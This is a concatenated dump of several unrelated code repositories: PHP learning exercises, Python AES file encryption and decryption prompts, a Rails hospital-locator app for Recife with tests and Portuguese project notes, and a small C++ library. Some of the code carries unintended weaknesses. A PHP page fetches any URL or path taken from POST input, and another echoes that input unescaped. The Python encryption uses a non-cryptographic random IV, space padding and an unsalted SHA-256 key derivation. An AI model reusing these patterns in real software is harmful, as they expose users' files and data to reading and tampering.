content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title></title> </head> <body> Введите текст <br> <form action='ip.php' metod='post'> <textarea rows="25" cols="100" name="n"><?php echo (isset($_POST['n'])) ? $_POST['n'] : 'Введите текст';?></textarea> <input type="submit" name="result"><br> </form> </body> </html><file_sep>/2header/1header5.php <?php if (!headers_sent()) { header('Location: http://www.tut.by'); exit; } ?>ddd<file_sep>/downloader/back.php <?php header("Location: file2.php"); ?><file_sep>/dz5.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $f=fopen("count.dat","a+"); $count=fgets($f); $count++; ftruncate($f,0); fwrite($f,$count); fclose($f); echo $count; ?> </body> </html><file_sep>/time/getdate.php <?php $today = getdate(); echo $today['month']; echo '<br>'; echo $today['weekday']; echo '<br>'; ?> <?php $week = ['Monday' => 'Понедельник', 'Tuesday' => 'Вторник', 'Wednesday' => 'Среда', 'Thursday' => 'Четверг', 'Friday' => 'Пятница', 'Saturday' => 'Суббота', 'Sunday' => 'Воскресенье']; $dat =getdate(); echo $week [$dat['weekday']]; echo '<br>'; ?> <?php echo $today = date("F j, Y, g:i a"); // March 10, 2001, 5:16 pm echo '<br>'; echo $today = date("m.d.y"); // 03.10.01 echo '<br>'; echo $today = date("j, n, Y"); // 10, 3, 2001 echo '<br>'; echo $today = date("Ymd"); // 20010310 echo '<br>'; echo $today = date('h-i-s, j-m-y, it is w Day'); // 05-16-18, 10-03-01, 1631 1618 6 Satpm01 echo '<br>'; echo $today = date('\i\t \i\s \t\h\e jS \d\a\y.'); // it is the 10th day. echo '<br>'; echo $today = date("D M j G:i:s T Y"); // Sat Mar 10 17:16:18 MST 2001 echo '<br>'; echo $today = date('H:m:s \m \i\s\ \m\o\n\t\h'); // 17:03:18 m is month echo '<br>'; echo $today = date("H:i:s"); // 17:16:18 ?> <?php echo '<br>'; echo date("M-d-Y",mktime(21,00,00,02,14,2020)); ?><file_sep>/time/first.php <?php echo time(); echo '<br>'; ?> <?php echo microtime(0); ?><file_sep>/downloader/file/ip (1).php <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title></title> </head> <body> Введите адрес страницы или сайта <br> <form action='ip.php' metod='post'> <input type="text" name="n"></inhut><br> <input type="submit" name="result"><br> </form> </body> </html> <?php $str=file_get_contents($_POST['n']); preg_match("/<body>(.*)<\/body>/ius",$str,$arr); $str=$arr[1]; $pat='/<.*?>/'; $rep="$1"; $str2=preg_replace($pat,$rep,$str); echo htmlentities($str2); ?>
45d5fb64d99499453424222e698ce8804a5983be
[ "Markdown", "PHP", "INI" ]
31
PHP
Yaroslav-Ivanov/first
6f3e1b9005d48812249dbb7b6632061f544a4ca7
4cd69f03aca8fe703fa51e03da140966ab52ddb8
refs/heads/master
<file_sep>import os, random, struct from Crypto.Cipher import AES import hashlib import getpass class DecryptDataPrompt(): ''' Prompt: 1. Get the filepath via prompt or drag/drop 2. (Optional) Get the output name 3. (Optional) Delete the initial file ''' def __init__(self): print('File to decrypt: ') while(True): try: f_name = raw_input('> ').strip() if(f_name == ''): # Enter key continue continue elif(os.path.isfile(f_name)): # Valid file path print("Valid path: %s" % f_name) self.f_name = f_name break else: # Invalid file path print("Invalid path: %s" % f_name) except KeyboardInterrupt: print " Decryption Cancelled" return print('Output file name, n for filename - .enc') while(True): try: output_name = raw_input('> ').strip() if(output_name == ''): # Enter key continue continue elif(output_name == 'n'): self.output_name = None break else: # Custom output name file_dir = os.path.dirname(self.f_name) output = os.path.join(file_dir, output_name) self.output_name = output print("Output as: %s" % output) break except KeyboardInterrupt: print " Decryption Cancelled" return print('Delete encoded file? (y/n)') while(True): try: del_resp = raw_input('> ').strip() if(del_resp == ''): # Enter key continue continue elif(del_resp == 'y'): # Delete the initial file self.del_resp = str(del_resp) break elif(del_resp == 'n'): # Do not delete initial file self.del_resp = str(del_resp) break else: # Invalid response print('Invalid Response') continue except KeyboardInterrupt: print " Decryption Cancelled" return print('Password: ') while(True): try: password = getpass.getpass('> ').strip() if(password == ''): # Enter key continue continue else: print('File decryption started') #decryptor = AES.new(key, mode, IV=IV) #plain = decryptor.decrypt(ciphertext) key = hashlib.sha256(password).digest() self.decrypt_file(key, self.f_name, self.output_name) # Delete the file if requested if(self.del_resp == 'y'): print ('Deleting encoded file') os.remove(self.f_name) print('File decryption complete') return except KeyboardInterrupt: print " Decryption Cancelled" return def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024): """ Decrypts a file using AES (CBC mode) with the given key. Parameters are similar to encrypt_file, with one difference: out_filename, if not supplied will be in_filename without its last extension (i.e. if in_filename is 'aaa.zip.enc' then out_filename will be 'aaa.zip') """ if not out_filename: out_filename = os.path.splitext(in_filename)[0] with open(in_filename, 'rb') as infile: origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0] iv = infile.read(16) decryptor = AES.new(key, AES.MODE_CBC, iv) with open(out_filename, 'wb') as outfile: while True: chunk = infile.read(chunksize) if len(chunk) == 0: break outfile.write(decryptor.decrypt(chunk)) outfile.truncate(origsize) if __name__ == '__main__': DecryptDataPrompt() <file_sep>import os, random, struct from Crypto.Cipher import AES import hashlib import getpass class EncryptDataPrompt(): ''' Prompt: 1. Get the filepath via prompt or drag/drop 2. (Optional) Get the output name 3. (Optional) Delete the initial file ''' def __init__(self): print('File to encrypt: ') while(True): try: f_name = raw_input('> ').strip() if(f_name == ''): # Enter key continue continue elif(os.path.isfile(f_name)): # Valid file path print("Valid path: %s" % f_name) self.f_name = f_name break else: # Invalid file path print("Invalid path: %s" % f_name) except KeyboardInterrupt: print " Encryption Cancelled" return print('Output file name, n for filename.enc') while(True): try: output_name = raw_input('> ').strip() if(output_name == ''): # Enter key continue continue elif(output_name == 'n'): self.output_name = None break else: # Custom output name file_dir = os.path.dirname(self.f_name) output = os.path.join(file_dir, output_name) self.output_name = output print("Output as: %s" % output) break except KeyboardInterrupt: print " Encryption Cancelled" return print('Delete initial file? (y/n)') while(True): try: del_resp = raw_input('> ').strip() if(del_resp == ''): # Enter key continue continue elif(del_resp == 'y'): # Delete the initial file self.del_resp = str(del_resp) break elif(del_resp == 'n'): # Do not delete initial file self.del_resp = str(del_resp) break else: # Invalid response print('Invalid Response') continue except KeyboardInterrupt: print " Encryption Cancelled" return print('Encryption password: ') while(True): try: password = getpass.getpass('> ').strip() if(password == ''): # Enter key continue continue else: # Double check password print('Please retype the password: ') retyped_password = getpass.getpass('> ').strip() # Encrypt if passwords match if(password == retyped_password): print('Passwords match') print('File encryption started') key = hashlib.sha256(password).digest() self.encrypt_file(key, self.f_name, self.output_name) # Delete the file if requested if(self.del_resp == 'y'): print ('Deleting initial file') os.remove(self.f_name) print('File encryption complete') return else: print('Passwords do not match') print('Encryption password: ') continue except KeyboardInterrupt: print " Encryption Cancelled" return def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024): """ Encrypts a file using AES (CBC mode) with the given key. key: The encryption key - a string that must be either 16, 24 or 32 bytes long. Longer keys are more secure. in_filename: Name of the input file out_filename: If None, '<in_filename>.enc' will be used. chunksize: Sets the size of the chunk which the function uses to read and encrypt the file. Larger chunk sizes can be faster for some files and machines. chunksize must be divisible by 16. """ if not out_filename: out_filename = in_filename + '.enc' iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16)) encryptor = AES.new(key, AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('<Q', filesize)) outfile.write(iv) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += ' ' * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) if __name__ == '__main__': EncryptDataPrompt() <file_sep># PyCrypto-example Quickly encrypt and decrypt files test To run the encryption prompt ``` python encrypt.py ``` To run the decryption prompt ``` python decrypt.py ```
b66ce79b53f873d1756e7a54f65dfed3949090e3
[ "Markdown", "Python" ]
3
Python
lostAstronaut/PyCrypto-example
ad6937ab7552aab5f7a4a79d8e0abe3f29544373
4cd85ec3c8fa5a19e161008374397b505adeee68
refs/heads/master
<file_sep># Postmortem (Iteração 3)- MedicalHelp Período: 24/10 - 6/11 ## O que estava planejado? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - <NAME> * Atualizar banco de dados com latitudes e longitudes - <NAME> * Adicionar marcadores nos hospitais - Guilherme Menge e <NAME> * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - Mateus Maciel * Modelo ER - <NAME> e <NAME> ## O que foi feito? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - <NAME> * Atualizar banco de dados com latitudes e longitudes - <NAME> * Adicionar marcadores nos hospitais - Guilherme Menge e Mateus Maciel * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - <NAME> * Modelo ER - <NAME> e <NAME> ## O que não foi feito? ## O que está planejado para a próxima iteração? * Adicionar layout dos marcadores na aplicação - Guilherme Menge * Ajustes necessários no front end - Guilherme Menge * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> ## Lições aprendidas * Lembrar de associar todos os commits a uma issue * Separar branches para cada desenvolvedor <file_sep>Given("I am on the home page") do visit "/" end When("click on the buscar button") do click_button("Buscar") end Then("I should see the map on a new page") do visit "/map" end <file_sep># This file should contain all the record creation needed to seed the database with its default values. # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). # # Examples: # # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) # Character.create(name: 'Luke', movie: movies.first) require 'smarter_csv' require 'database_cleaner' DatabaseCleaner.clean_with(:truncation) filename = '/home/mateus/periodo4/es/planilhas/_tbEstabelecimento201707.csv' options = {:key_mapping => {:unwanted_row => nil, :old_row_name => :new_name}} n = SmarterCSV.process(filename, options) do |array| puts array.first # we're passing a block in, to process each resulting hash / =row (the block takes array of hashes) # when chunking is not enabled, there is only one hash in each array Hospital.create( array.first ) end <file_sep>And ("there are clinics near me") do expect(page).to have_xpath "//script[contains(., icon.consult_u)]", visible: false end Then("I should see a pin on the map on every clinic location") do expect(page).to have_xpath "//script[contains(., icon.consult_u)]", visible: false end And ("there are not clinics near me") do expect(page).not_to have_xpath "//script[contains(., icon.consult_u)]" end Then("I should not see a clinic pin on the map") do expect(page).not_to have_xpath "//script[contains(., icon.consult_u)]" end <file_sep>And ("there are general hospitals near me") do expect(page).to have_xpath "//script[contains(., icon.geral_u)]", visible: false end Then("I should see a pin on the map on every general hospital location") do expect(page).to have_xpath "//script[contains(., icon.geral_u)]", visible: false end And ("there are not general hospitals near me") do expect(page).not_to have_xpath "//script[contains(., icon.geral_u)]" end Then("I should not see a general hospital pin on the map") do expect(page).not_to have_xpath "//script[contains(., icon.geral_u)]" end <file_sep>## Ata de Reunião | Data | Local | | - | - | | 05/09/2017 | CIn - UFPE | ### Participantes | Participante | Função | | - | - | | <NAME> | Desenvolvedor | | <NAME> | Product Owner e Desenvolvedora| | <NAME> | Desenvolvedora | | <NAME> | Gerente do projeto e Desenvolvedor| ### Objetivos - Definir escopo do projeto - Estabelecer funcionalidades ### Tarefas - Pesquisar e escolher a melhor API para mapas. (Mateus) - Criar as histórias do usuário. (Coletivo) - Criação de mockups e elementos visuais (Maria Eugênia) ### Tópicos Discutidos 1. Funcionalidades * Retornar o hospital mais próximo com base no serviço procurado * Retornar o hospital mais próximo com base na disponibilidade de um plano de saúde pelo usuário. 2. Funcionalidades essenciais * Ser responsivo * Ser intuitivo * Design deve ser leve, de maneira a carregar instantaneamente aos olhos do usuário e poupando o pacote de dados do mesmo. 3. Funcionalidades essenciais - MVP (Mínimo Produto Viável) * Aplicação que retorna o hospital (público ou privado) mais próximo com base apenas na localização. <file_sep>Given("I am on the mappage") do visit "/map" end Then("I should see a pin on the map") do expect(page).to have_xpath "//script[contains(., marker)]", visible: false end <file_sep># Postmortem (Iteração 2)- MedicalHelp Período: 10/10 - 23/10 ## O que estava planejado? * Configurar PostgreSQL - Mateus Maciel * Popular banco de dados - <NAME> * Filtrar no controller hospitais em Recife - <NAME> * Criar testes para features e funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - <NAME> * Front end da tela inicial - Guilherme Menge ## O que foi feito? * Configurar PostgreSQL - Mateus Maciel * Testes rspec para rotas e views - Mateus Maciel * Popular banco de dados - <NAME> * Filtrar no controller hospitais em Recife - <NAME> * Criar testes para features e funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - <NAME> * Front end da tela inicial - Guilherme Menge * Front end para tela do mapa - Guilherme Menge * Atualização das HUs - <NAME> ## O que não foi feito? * Teste rspec model ## O que está planejado para a próxima iteração? * Fazer layout dos marcadores - <NAME> * Adicionar latitudes e longitudes com geocoding - Mariana Lima * Atualizar banco de dados com latitudes e longitudes - Mariana Lima * Adicionar marcadores nos hospitais - Guilherme Menge e Mateus Maciel * Ajustes necessários no front end - Guilherme Menge * Testes para localização e marcadores gmaps - <NAME> * Testes rspec marcadores mapa - Mate<NAME> * Modelo ER - <NAME> e <NAME> ## Lições aprendidas * Não acumular atividades * Utilizar melhor as branches <file_sep>Rails.application.routes.draw do get '' => 'hospitals#busca_hospitais' get '/map' => 'hospitals#showmap' end <file_sep>json.partial! "hospitals/hospital", hospital: @hospital <file_sep>require "rails_helper" RSpec.describe HospitalsController, type: :routing do describe "routing" do it "routes to #busca_hospitais" do expect(:get => "/").to route_to("hospitals#busca_hospitais") end it "routes to #showmap" do expect(:get => "/map").to route_to("hospitals#showmap") end end describe "routing to invalid urls" do it "routes to #new" do expect(:get => "/new").not_to be_routable end it "routes to #show" do expect(:get => "/1").not_to be_routable end it "routes to #edit" do expect(:get => "/1/edit").not_to be_routable end end describe "routing to invalid actions" do it "routes to POST method" do expect(:post => "/").not_to be_routable end it "routes to PUT method" do expect(:put => "/").not_to be_routable end it "routes to DELETE method" do expect(:delete => "/").not_to be_routable end end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/showmap", type: :view do before :each do assign(:centrossaude, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:consultorios, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:clinicas, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:hospgerais, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) assign(:hospespecializados, [Hospital.create(nu_latitude: 1, nu_longitude: 2)]) render end it 'shows voltar button' do expect(rendered).to have_selector ("#back") end it 'shows the logo' do expect(rendered).to have_selector ("#logo") end it 'shows the map' do expect(rendered).to have_selector ("#map") end end <file_sep># Postmortem (Iteração 0)- MedicalHelp Período: 07/08 - 25/09 ## O que estava planejado? * Reuniões com o cliente - Todos * Definir o tema e os papéis dentro do time - Todos * Descrição do Projeto - Todos * Artefatos visuais - <NAME> * HU’s - Todos * Se aprofundar mais na linguagem Ruby - Todos ## O que foi feito? * Reuniões com o cliente - Todos * Definir o tema e os papéis dentro do time - Todos * Descrição do Projeto - Todos * Artefatos visuais - <NAME> * HU’s - Todos ## O que não foi feito? * Se aprofundar mais na linguagem Ruby (Todos). Muita demanda das outras disciplinas, acabou fazendo com que essa atividade fosse escanteada. ## O que está planejado para a próxima iteração? * Novas reuniões com o cliente - Todos * Separação das funcionalidades que devem ser implementadas e qual dos membros ficarão responsáveis por cada uma - Mateus (GP) * Iniciar desenvolvimento de algumas histórias de usuário - Todos * Iniciar desenvolvimento de testes iniciais - Todos ## Lições aprendidas * Continuar distribuindo bem as atividades antes do período de entrega para não entregar nada mal feito e nas pressas. * Importância da união do grupo e do alinhamento. * Saber o que cada um está fazendo, para não deixar ninguém sobrecarregado. <file_sep>Given("I have allowed access to my GPS location") do expect(page).to have_xpath "//script[contains(., navigator.geolocation)]", visible: false end Then("the center of the map should be approximately on my current location") do expect(page).to have_xpath "//script[contains(., getCurrentPosition)]", visible: false end Given("I have not allowed access to my GPS location") do expect(page).to have_xpath "//script[contains(., handleLocationError)]", visible: false end Then("the center of the map should be approximately on the default location") do expect(page).to have_xpath "//script[contains(., map.setCenter)]", visible: false end <file_sep># Postmortem (Iteração 4)- MedicalHelp Período: 06/11 - 27/11 ## O que estava planejado? * Adicionar layout dos marcadores na aplicação - <NAME> * Ajustes necessários no front end - <NAME> * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> ## O que foi feito? * Adicionar layout dos marcadores na aplicação - <NAME> * Ajustes necessários no front end - <NAME> * Screencast - <NAME> * Teste para filtro de hospitais - <NAME> * Filtrar hospitais pelo tipo - <NAME> * Procurar alternativas para geolocalização mais precisa - <NAME> * Design dos marcadores - <NAME> ## O que não foi feito? ## Lições aprendidas * Saber a produtividade da equipe para planejar as atividades de uma iteração * Importância do gerenciamento de mudanças <file_sep>Given("I am on the map page") do visit "/map" end When("click on the voltar button") do click_button("Voltar") end Then("I should go back to the homepage") do visit "/" end <file_sep>require 'rails_helper' RSpec.describe "hospitals/busca_hospitais", type: :view do before :each do render end it 'shows a button' do expect(rendered).to have_selector ("#search") end it 'shows the logo' do expect(rendered).to have_selector ("#logo") end end <file_sep>json.extract! hospital, :id, :created_at, :updated_at json.url hospital_url(hospital, format: :json) <file_sep>class Hospitals < ActiveRecord::Migration[5.1] def change change_table :hospitals do |t| t.string :co_unidade t.string :co_cnes t.string :nu_cnpj_mantenedora t.string :tp_pfpj t.string :nivel_dep t.string :no_razao_social t.string :no_fantasia t.string :no_logradouro t.string :nu_endereco t.string :no_complemento t.string :no_bairro t.string :co_cep t.string :co_regiao_saude t.string :co_micro_regiao t.string :co_distrito_sanitario t.string :co_distrito_administrativo t.string :nu_telefone t.string :nu_fax t.string :no_email t.string :nu_cpf t.string :nu_cnpj t.string :co_atividade t.string :co_clientela t.string :nu_alvara t.timestamp :dt_expedicao t.string :tp_orgao_expedidor t.timestamp :dt_val_lic_sani t.string :tp_lic_sani t.string :tp_unidade t.string :co_turno_atendimento t.string :co_estado_gestor t.string :co_municipio_gestor t.string :dt_atualizacao t.string :co_usuario t.string :co_cpfdiretorcln t.string :reg_diretorcln t.string :st_adesao_filantrop t.string :co_motivo_desab t.string :no_url t.float :nu_latitude t.float :nu_longitude t.string :dt_atu_geo t.string :no_usuario_geo t.string :co_natureza_jur t.string :tp_estab_sempre_aberto t.string :st_geracredito_gerente_sgif t.string :st_conexao_internet t.string :co_tipo_unidade t.string :no_fantasia_abrev t.string :tp_gestao t.date :dt_atualizacao_origem end end end <file_sep>class HospitalsController < ApplicationController before_action :set_hospital, only: [:show, :edit, :update, :destroy] # GET /hospitals # GET /hospitals.json def index @hospitals = Hospital.where("co_municipio_gestor = '261160'") end def busca_hospitais @hospitals = Hospital.where("co_municipio_gestor = '261160'") end def showmap @centrossaude = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "2"]) @consultorios = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "22"]) @clinicas = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "36"]) @hospgerais = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "5"]) @hospespecializados = Hospital.where(["co_municipio_gestor = ? and tp_unidade = ?", "261160", "7"]) end # GET /hospitals/1 # GET /hospitals/1.json def show end # GET /hospitals/new def new @hospital = Hospital.new end # GET /hospitals/1/edit def edit end # POST /hospitals # POST /hospitals.json def create @hospital = Hospital.new(hospital_params) respond_to do |format| if @hospital.save format.html { redirect_to @hospital, notice: 'Hospital was successfully created.' } format.json { render :show, status: :created, location: @hospital } else format.html { render :new } format.json { render json: @hospital.errors, status: :unprocessable_entity } end end end # PATCH/PUT /hospitals/1 # PATCH/PUT /hospitals/1.json def update respond_to do |format| if @hospital.update(hospital_params) format.html { redirect_to @hospital, notice: 'Hospital was successfully updated.' } format.json { render :show, status: :ok, location: @hospital } else format.html { render :edit } format.json { render json: @hospital.errors, status: :unprocessable_entity } end end end # DELETE /hospitals/1 # DELETE /hospitals/1.json def destroy @hospital.destroy respond_to do |format| format.html { redirect_to hospitals_url, notice: 'Hospital was successfully destroyed.' } format.json { head :no_content } end end private # Use callbacks to share common setup or constraints between actions. def set_hospital @hospital = Hospital.find(params[:id]) end # Never trust parameters from the scary internet, only allow the white list through. def hospital_params params.fetch(:hospital, {}) end end <file_sep>class Hospital < ApplicationRecord geocoded_by :address, :latitude => :nu_latitude, :longitude => :nu_longitude after_validation :geocode def address [no_logradouro, nu_endereco, no_complemento, no_bairro].compact.join(', ') end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/show", type: :view do end <file_sep>Given("I clicked on the buscar button") do visit "/" click_button("Buscar") end When("The page loads") do visit "/map" end Then("I should see the map") do expect(page).to have_css '#map' end <file_sep>#3DB2B2 ~verde #818182 ~cinza #FDFCFC ~frostine/branco <file_sep>require 'rails_helper' RSpec.describe "hospitals/new", type: :view do end <file_sep>require 'rails_helper' RSpec.describe Hospital, type: :model do it "has none to begin with" do expect(Hospital.count).to eq 0 end it "has one after adding one" do Hospital.create expect(Hospital.count).to eq 1 end it "has none after one was created in a previous example" do expect(Hospital.count).to eq 0 end end <file_sep>## Histórias de Usuário ------------------------ como paciente quero encontrar o hospital mais próximo para ir até lá e realizar tratamento ------------------------ como vítima de acidente quero encontrar o hospital mais próximo que atenda emergência para ir até lá e ser atendido ------------------------ como paciente quero encontrar o hospital mais próximo que atenda plano de saúde para ir até lá e me consultar ------------------------ como usuário da aplicação quero que seja retornado um mapa para encontrar o hospital facilmente ------------------------ como usuário da aplicação quero fazer a consulta com um clique para obter o mapa rapidamente ------------------------ como usuário da aplicação quero que seja retornado um mapa para que eu possa navegar por ele ------------------------ como usuário da aplicação quero fazer a consulta com um clique para obter no mapa a região onde me encontro ------------------------ como usuário da aplicação quero clicar em "voltar" para que eu possa retornar a página inicial ------------------------ como usuário da aplicação quero ver um pin no mapa para poder enxergar mais facilmente a localização ------------------------ como usuário quero ver o centro no mapa aproximadamente na minha localização atual para ter uma visão global dos hospitais perto de mim <file_sep># Postmortem (Iteração 1)- MedicalHelp Período: 25/09 - 09/10 ## O que estava planejado? * Criar model hospital - <NAME> * Criar controller hospitals - <NAME> * Criar métodos no controller - Mariana Lima * Criar view com botão (link para view gmaps) - Guilherme Menge * Configurar as rotas - <NAME> * Criar view gmaps com api javascript - <NAME> * Configurar ambiente (gems para teste, bootstrap) - Mateus Maciel e Guilherme Menge * Criar testes com cucumber e rspec - <NAME> e Mateus Maciel ## O que foi feito? * View com api do google maps - Mateus Maciel * Configuração das rotas - <NAME> * Ambiente configurado (testes e bootstrap) - Mateus Maciel e Guilherme Menge * Teste cucumber (BDD) para duas HUs - <NAME> * Teste rspec para os controllers - Mateus Maciel * Criação scaffold hospital - Mariana Lima * Métodos definidos no controller - <NAME> * Tela com botão buscar - Guilherme Menge * Deployment Heroku - Mateus Maciel ## O que não foi feito? * Não foram feitos testes para as views nem para o model ## O que está planejado para a próxima iteração? * Configurar PostgreSQL - Mateus Maciel * Popular banco de dados - Mateus Maciel e Guilherme Menge * Filtrar no controller hospitais em Recife - Mariana Lima * Criar testes para funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - Mariana Lima * Front end da tela inicial - Guilherme Menge ## Lições aprendidas * Importância da união do grupo e do alinhamento. * Saber o que cada um está fazendo, para não deixar ninguém sobrecarregado. <file_sep># MedicalHelp-Recife Projeto da disciplina de Engenharia de Software (IF977), do curso de graduação em Sistemas de Informação do Centro de Informática da Universidade Federal de Pernambuco (UFPE). ## Link da aplicação no Heroku: http://medicalhelp-recife.herokuapp.com/ ## Link para o screencast da aplicação: https://collaaj.com/Video/VideoPlayback?vid=bbd7211f-9dd2-4d36-96c8-b441a18ed233 ## Equipe: * <NAME>: Desenvolvedor * <NAME>: Desenvolvedora de Testes e Product Owner * <NAME>: Gerente do Projeto e Desenvolvedor * <NAME>: Desenvolvedora ## Descrição O MedicalHelp-Recife é uma aplicação SaaS que indica hospitais ao usuário (vítima ou testemunha) baseado em sua localização e algumas informações adicionais: * Estado de saúde da vítima (emergência, consultas de rotina, etc.); * Se a vítima possui plano de saúde ou não; * Preferência do usuário por hospital particular ou público. ## Justificativa No ano de 2015, em Recife, houve 70.011 solicitações de atendimento ao SAMU, destas, 43.477 não eram de urgência. Imagine quantas dessas pessoas chamaram o Serviço de Atendimento Médico de Urgência apenas por não saber para onde ir e como prosseguir. Nossa aplicação Web surge para solucionar esse problema, com o mapeamento das unidades de saúde mais próximas do usuário filtradas por suas necessidades, e ainda, ajuda a melhorar o fluxo dos atendimentos de urgência do SAMU, por criar uma plataforma alternativa para casos específicos. Inicialmente a aplicação buscará hospitais em Recife e Região Metropolitana. <file_sep>Then("I should see the aplication logo") do expect(page).to have_css '#logo' end <file_sep>require 'rails_helper' RSpec.describe "hospitals/edit", type: :view do end <file_sep>require 'rails_helper' # This spec was generated by rspec-rails when you ran the scaffold generator. # It demonstrates how one might use RSpec to specify the controller code that # was generated by Rails when you ran the scaffold generator. # # It assumes that the implementation code is generated by the rails scaffold # generator. If you are using any extension libraries to generate different # controller code, this generated spec may or may not pass. # # It only uses APIs available in rails and/or rspec-rails. There are a number # of tools you can use to make these specs even more expressive, but we're # sticking to rails and rspec-rails APIs to keep things simple and stable. # # Compared to earlier versions of this generator, there is very limited use of # stubs and message expectations in this spec. Stubs are only used when there # is no simpler way to get a handle on the object needed for the example. # Message expectations are only used when there is no simpler way to specify # that an instance is receiving a specific message. # # Also compared to earlier versions of this generator, there are no longer any # expectations of assigns and templates rendered. These features have been # removed from Rails core in Rails 5, but can be added back in via the # `rails-controller-testing` gem. RSpec.describe HospitalsController, type: :controller do # This should return the minimal set of attributes required to create a valid # Hospital. As you add validations to Hospital, be sure to # adjust the attributes here as well. let(:valid_attributes) { skip("Add a hash of attributes valid for your model") } let(:invalid_attributes) { skip("Add a hash of attributes invalid for your model") } # This should return the minimal set of values that should be in the session # in order to pass any filters (e.g. authentication) defined in # HospitalsController. Be sure to keep this updated too. let(:valid_session) { {} } describe "GET #busca_hospitais" do subject {get :busca_hospitais} it "renders the homepage" do expect(subject).to render_template("busca_hospitais") end it 'does not render a diferent template' do expect(subject).to_not render_template("showmap") end end describe "GET #showmap" do subject {get :showmap} it "renders the map page" do expect(subject).to render_template("showmap") end it 'does not render a diferent template' do expect(subject).to_not render_template("busca_hospitais") end end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/index", type: :view do end <file_sep>require 'rails_helper' RSpec.describe "Hospitals", type: :request do end
eb9c79ed7a1068a690cc8e4667209f2ad11b2f45
[ "Markdown", "Ruby" ]
34
Markdown
IF977/MedicalHelp-Recife
fc54805ed4cb584d0daf92e1a9acae708eb31d53
b70f84610dcb87dbecb3187545f3be22bc3097b2
refs/heads/master
<repo_name>botya02/java2hm1<file_sep>/src/com/company/Grandfather.java package com.company; public abstract class Grandfather { private String age; private String name; private Food food; private Outerwear outerwear; public String getAge() { return age; } public Grandfather(String mona) { } public String getName() { return name; } public Food getFood() { return food; } public Outerwear getOuterwear() { return outerwear; } public Grandfather(String age, String name, Food food, Outerwear outerwear) { this.age = age; this.name = name; this.food = food; this.outerwear = outerwear; } public final String getInfo(){ return "Age: " + getAge() + "\nName: " + getName() + "\nFood: " + getFood() + "\nOuterwear: " + getOuterwear(); } } <file_sep>/src/com/company/Mother.java package com.company; public class Mother extends Grandfather { public Mother(String age, String name, Food food, Outerwear outerwear) { super(age, name, food, outerwear); } public Mother(String age, String name) { super(name); } public Mother(String name) { super(name); } public void name(String age, String name){ } public final void name(String name){ } }
79b453fccf86aafd8ad3e12ea9b1f16f818649ff
[ "Java" ]
2
Java
botya02/java2hm1
114d1e5d7c776c3efcd361e3b6b4d067679f2fe8
bbfb1da591dae43a1697fedd0a516a09b2885e55
refs/heads/master
<file_sep>cmake_minimum_required(VERSION 3.14) project(luna) set(CMAKE_CXX_STANDARD 17) set(XLIB_SOURCES xlib/visual/canvas.cpp xlib/visual/image.cpp xlib/visual/viewer.cpp xlib/visual/writer.cpp ) add_library(xlib ${XLIB_SOURCES}) find_package(png REQUIRED) target_include_directories(xlib PRIVATE ${PNG_INCLUDE_DIRS}) set(CMAKE_AUTOMOC ON) set(CMAKE_AUTOUIC ON) find_package(Qt5 CONFIG REQUIRED Core Gui Widgets) target_link_libraries(xlib PRIVATE ${PNG_LIBRARIES} Qt5::Core Qt5::Gui Qt5::Widgets) add_executable(luna main.cpp) target_link_libraries(luna PRIVATE xlib) add_executable(test_line test/line.cpp) target_include_directories(test_line PRIVATE ./) target_link_libraries(test_line PRIVATE xlib) add_executable(test_fill test/fill.cpp) target_include_directories(test_fill PRIVATE ./) target_link_libraries(test_fill PRIVATE xlib) <file_sep># Project Luna For my study and practice. <file_sep>#ifndef XLIB__MATH__HPP #define XLIB__MATH__HPP #include <cmath> #include <cstdlib> #include "type.hpp" namespace xlib { class math { public: static inline float32 round_float32( float32 value ) { return round( value ); } static inline float64 round_float64( float64 value ) { return round( value ); } static inline int32 absolute_int32( int32 value ) { return abs( value ); } }; } #endif 